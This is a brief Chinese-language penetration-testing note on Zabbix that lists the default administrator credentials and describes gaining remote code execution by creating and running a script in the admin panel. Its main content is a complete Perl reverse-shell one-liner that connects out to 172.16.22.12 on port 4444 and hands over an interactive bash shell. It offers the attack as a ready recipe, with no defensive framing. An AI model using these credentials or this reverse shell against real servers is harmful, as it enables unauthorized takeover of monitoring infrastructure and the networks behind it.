zabbix

默认密码: Admin zabbix

1. zabbix后台RCE

在后台创建一个脚本
Pasted image 20260122144939.png
然后执行
Pasted image 20260122145008.png
Pasted image 20260122145013.png

perl -e 'use Socket;$i="172.16.22.12";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'